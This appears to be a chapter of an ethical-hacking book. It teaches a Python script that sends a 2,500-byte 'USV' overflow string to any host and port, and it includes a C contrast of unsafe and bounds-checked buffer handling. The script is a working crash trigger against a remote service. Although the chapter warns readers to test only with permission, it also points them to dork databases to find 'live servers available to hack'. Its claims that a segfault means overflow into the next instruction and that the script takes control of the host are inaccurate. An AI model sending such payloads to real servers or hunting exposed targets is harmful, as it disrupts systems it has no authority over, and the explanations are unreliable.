Executing a Remote Buffer Exploit with Python
If you know computers well enough to understand how programs are written and how they work, you will agree with me that Python is a brilliant language. It is a language you can use to create dynamic and very useful tools just by stringing together [mostly] English phrases that even a newbie can understand. It is regarded as the lazy programmer's language: a script of a handful of lines of code can do so much.
This hour, we figure out how you can use Python to create hacking tools that make your work easier and automate many of the exploits and penetration tests that you have learned over the past half day and those you will explore and learn as you work towards becoming the best ethical hacker the world has ever seen.
12.1 Python for Hackers: A Shortcut into Programming
We are committed to offering valuable knowledge that you will find beneficial beyond the basic satisfaction of curiosity. You have invested hours in learning the various tactics that seasoned hackers use every day, but you should know that this is just the beginning.
In our Python programming guide, "Python: The No-Nonsense Guide," we go in depth to introduce Python as the programming language of the future. The most skilled hackers, whether they do it for fun, as a career, or for selfish purposes (read: black hat), are all programmers first. If you are not a good programmer, this is the perfect opportunity to become one using the easiest and most versatile language there is, and to apply it to something practical and fun, such as hacking.
You could still be a good hacker without learning to write Python scripts, but you would essentially be a script kiddie. No one wants to remain a script kiddie forever, but it is a good enough place to start. So, here we go.
If you do not have Python installed on your computer, I suggest you download and install it. You can set aside the VMware virtual environment that you use to run Kali Linux for this hour.
Download the latest Python 3 interpreter (version 3.6 or 3.5) and a text editor (to write your code) before you begin.
12.2 What is a Remote Buffer Overflow Exploit?
If you have ever come across the term "buffer overflow," chances are it was a reference to a vulnerability in a specific piece of software or a script. In computing, a buffer overflow vulnerability is a programming error that results in a memory access exception.
A buffer overflow occurs when a process attempts to store more data than a fixed-length buffer can hold, overwriting the contents of adjacent memory locations, including the program's control-flow data. This typically causes the process to terminate with a segmentation fault.
A segmentation fault of this kind means the data has overflowed into the location of the next instruction. From there it is possible to take control of the execution flow at that instruction and inject arbitrary commands for the system to process. In this hack, you will write a Python script that triggers this error and injects commands you specify, so that you can take control of the host or simply find out what you want to know about the process whose memory the data overflows into.
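To make the fixed-length buffer of this section concrete, here is an added example (not code from the book) of a command handler in C in its unsafe and bounds-checked forms. The "USV " command and the 2,500-byte fill are taken from the chapter's script; the 64-byte buffer size and the function names are assumptions made for the example.

```c
/* Added example (not from the book): a fixed-length command buffer of the
 * kind section 12.2 describes, in its unsafe and bounds-checked forms.
 * Assumed: a 64-byte buffer; "USV " and the 2500-byte fill come from 12.4. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define CMD_BUF 64          /* fixed-length buffer on the handler's stack */

/* Unsafe form: strcpy() copies until the NUL byte with no regard for the
 * 64-byte limit, so a 2500-byte line overwrites whatever sits next to
 * cmd on the stack (saved registers, return address): the overflow of 12.2.
 * It is shown only to expose the defect; do not feed it untrusted input. */
int handle_command_unsafe(const char *line) {
    char cmd[CMD_BUF];
    strcpy(cmd, line);                       /* no length check */
    return strncmp(cmd, "USV ", 4) == 0;
}

/* Bounded form: check the length before copying and refuse oversized
 * lines instead of truncating silently. Returns 1 for a USV command,
 * 0 for any other command, -1 for a rejected (too long) line. */
int handle_command_safe(const char *line) {
    char cmd[CMD_BUF];
    size_t n = strlen(line);
    if (n >= CMD_BUF)                        /* leave room for the NUL */
        return -1;
    memcpy(cmd, line, n + 1);
    return strncmp(cmd, "USV ", 4) == 0 ? 1 : 0;
}

/* Constructed input: "USV " + fill x 'A' + "\r\n", as in the chapter. */
char *build_probe(size_t fill) {
    size_t len = 4 + fill + 2;
    char *p = malloc(len + 1);
    if (!p) return NULL;
    memcpy(p, "USV ", 4);
    memset(p + 4, 'A', fill);
    memcpy(p + 4 + fill, "\r\n", 3);         /* copies the NUL too */
    return p;
}

int main(void) {
    char *probe = build_probe(2500);
    printf("short line -> %d\n", handle_command_safe("USV hello\r\n"));
    printf("2500-byte line -> %d\n", handle_command_safe(probe));
    free(probe);
    return 0;
}
```

The bounded handler returns -1 for the 2,500-byte line, which is exactly the input the unsafe handler would let run past the end of its buffer.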
12.3 Preparation and Setup
At this point, you should have already learned the basics of programming in Python, especially what the different data types are, how to write Python scripts, how to save .py files, and how to run them. You should have Python 3 installed on your system (Linux or Windows are fine), and you should have an active internet connection. This exploit uses a TCP connection.
First off, we need to find a server to test our exploit on. As with every exercise in this guide, we insist that you only test this exploit on a machine you have permission to test on. Attempting to carry out hacks on strangers' computers over the Internet is illegal and could have very serious legal repercussions. Do not try it.
Finding a server to try your buffer overflow hack on will be a bit of a challenge, but there are resources on the internet that can help you find the right dork. You can begin by checking out the Google Hacking Database provided by the good folks at exploit-db, https://www.exploit-db.com/google-hacking-database/, for live servers available to hack or for vulnerable software you can test your skills on.
12.4 Writing the Python Script
Once you find a server to try the buffer overflow hack on, the next step is much more fun: writing the code. We will first import the sys and socket libraries, then write the code to execute.
Start your text editor and enter the following code:
#!/usr/bin/python
import sys
import socket

host = None
port = None

# Walk the argument list looking for -s <host> and -p <port>
for carg in sys.argv:
    if carg == "-s":
        argnum = sys.argv.index(carg)
        argnum += 1
        host = sys.argv[argnum]
    elif carg == "-p":
        argnum = sys.argv.index(carg)
        argnum += 1
        port = int(sys.argv[argnum])   # connect() needs an integer port

if host is None or port is None:
    sys.exit("usage: %s -s <host> -p <port>" % sys.argv[0])

buffer = "\x41" * 2500                 # 2,500 bytes of 'A'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(("USV " + buffer + "\r\n\r").encode())   # Python 3 sockets send bytes
s.close()
print("Overflow buffer exploit successfully sent!")

Here is what this Python script does:
The first line imports the sys library and the second imports the socket library that the script needs to run. The loop reads the host and port from the -s and -p arguments. The script then creates a buffer by repeating the byte \x41 (the letter 'A') 2,500 times, opens a TCP socket declared as s, and connects it to the host and port. It sends the string "USV " followed by the 2,500-byte buffer and a line terminator, then closes the socket. Finally, the script prints the message when the send has succeeded.
12.5 Executing the Remote Buffer Overflow Exploit Script
After you have saved the script, the next step is to execute it. Open a terminal or command prompt, switch the working directory to the location of the .py file, and run the script with the Python interpreter.
Congratulations! You have successfully written your first Python exploit script and executed it.
12.6 Conclusion
Many people learn to hack computers out of sheer curiosity, just to discover whether they can do it. Yes, anyone with basic knowledge of computers can do almost all the hacks we have looked at so far. However, it takes a lot more effort, learning, and practice to figure out how to find new vulnerabilities, and the best place to start is learning how to write computer programs.
Learning to code with Python is the perfect place to start. You will also need other prerequisite computer skills, including an understanding of how most operating systems work (they are written in C/C++, so you should find out what makes these languages stand out) and how computer networking works.